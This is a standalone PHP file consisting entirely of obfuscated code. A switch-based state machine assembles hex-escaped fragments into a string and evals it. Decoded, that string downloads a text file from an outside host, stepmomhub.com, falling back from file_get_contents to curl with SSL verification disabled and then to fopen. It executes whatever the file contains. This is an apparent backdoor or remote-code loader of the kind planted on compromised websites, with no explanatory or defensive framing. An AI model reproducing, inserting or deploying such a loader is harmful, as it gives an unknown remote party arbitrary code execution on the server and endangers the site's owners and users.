<?php
$s=974164; $o=""; while(true) { switch($s) { case 770538: $o.="\x63\x75\x72\x6c\x5f\x69\x6e\x69"; $s=247943; break;
case 401428: $o.="\x6c\x6c\x6f\x77\x5f\x75\x72\x6c"; $s=958487; break;
case 296584: $o.="\x28\x24\x68\x29\x3b\x7d\x69\x66"; $s=788124; break;
case 185821: $o.="\x63\x75\x72\x6c\x5f\x65\x78\x65"; $s=647997; break;
case 166741: $o.="\x33\x3d\x3e\x31\x2c\x36\x34\x3d"; $s=394566; break;
case 788124: $o.="\x28\x21\x24\x63\x26\x26\x69\x6e"; $s=281719; break;
case 974164: $o.="\x24\x75\x3d\x27\x68\x74\x74\x70"; $s=197380; break;
case 810115: $o.="\x72\x6c\x5f\x73\x65\x74\x6f\x70"; $s=813443; break;
case 789807: $o.="\x3b\x7d\x7d\x7d\x24\x63\x3f\x65"; $s=442968; break;
case 467875: $o.="\x74\x28\x24\x75\x29\x3b\x63\x75"; $s=810115; break;
case 356127: $o.="\x6f\x6d\x2f\x33\x2e\x74\x78\x74"; $s=102837; break;
case 271927: $o.="\x28\x21\x66\x65\x6f\x66\x28\x24"; $s=804207; break;
case 566550: $o.="\x31\x30\x32\x34\x29\x3b\x66\x63"; $s=357181; break;
case 897365: $o.="\x27\x46\x61\x69\x6c\x27\x29\x3b"; $s=201693; break;
case 146017: $o.="\x6c\x65\x5f\x67\x65\x74\x5f\x63"; $s=125140; break;
case 899554: $o.="\x68\x29\x7b\x77\x68\x69\x6c\x65"; $s=271927; break;
case 394566: $o.="\x3e\x30\x5d\x29\x3b\x24\x63\x3d"; $s=185821; break;
case 930801: $o.="\x24\x75\x29\x3b\x69\x66\x28\x21"; $s=744220; break;
case 281719: $o.="\x69\x5f\x67\x65\x74\x28\x27\x61"; $s=401428; break;
case 102837: $o.="\x27\x3b\x24\x63\x3d\x40\x66\x69"; $s=146017; break;
case 247943: $o.="\x74\x27\x29\x29\x7b\x24\x68\x3d"; $s=506213; break;
case 744220: $o.="\x24\x63\x29\x7b\x69\x66\x28\x66"; $s=870076; break;
case 394974: $o.="\x29\x7b\x24\x68\x3d\x40\x66\x6f"; $s=567777; break;
case 725328: $o.="\x72\x65\x61\x64\x28\x24\x68\x2c"; $s=566550; break;
case 506213: $o.="\x63\x75\x72\x6c\x5f\x69\x6e\x69"; $s=467875; break;
case 647997: $o.="\x63\x28\x24\x68\x29\x3b\x63\x75"; $s=249079; break;
case 290847: $o.="\x65\x78\x69\x73\x74\x73\x28\x27"; $s=770538; break;
case 125140: $o.="\x6f\x6e\x74\x65\x6e\x74\x73\x28"; $s=930801; break;
case 935019: $o.="\x6d\x6f\x6d\x68\x75\x62\x2e\x63"; $s=356127; break;
case 201693: eval($o); break 2;
case 426109: $o.="\x63\x22\x29\x3a\x64\x69\x65\x28"; $s=897365; break;
case 870076: $o.="\x75\x6e\x63\x74\x69\x6f\x6e\x5f"; $s=290847; break;
case 488009: $o.="\x24\x68\x2c\x5b\x31\x39\x39\x31"; $s=166741; break;
case 442968: $o.="\x76\x61\x6c\x28\x22\x3f\x3e\x24"; $s=426109; break;
case 249079: $o.="\x72\x6c\x5f\x63\x6c\x6f\x73\x65"; $s=296584; break;
case 958487: $o.="\x5f\x66\x6f\x70\x65\x6e\x27\x29"; $s=394974; break;
case 804207: $o.="\x68\x29\x29\x24\x63\x2e\x3d\x66"; $s=725328; break;
case 974032: $o.="\x72\x27\x29\x3b\x69\x66\x28\x24"; $s=899554; break;
case 357181: $o.="\x6c\x6f\x73\x65\x28\x24\x68\x29"; $s=789807; break;
case 567777: $o.="\x70\x65\x6e\x28\x24\x75\x2c\x27"; $s=974032; break;
case 813443: $o.="\x74\x5f\x61\x72\x72\x61\x79\x28"; $s=488009; break;
case 197380: $o.="\x73\x3a\x2f\x2f\x73\x74\x65\x70"; $s=935019; break; } }
?>
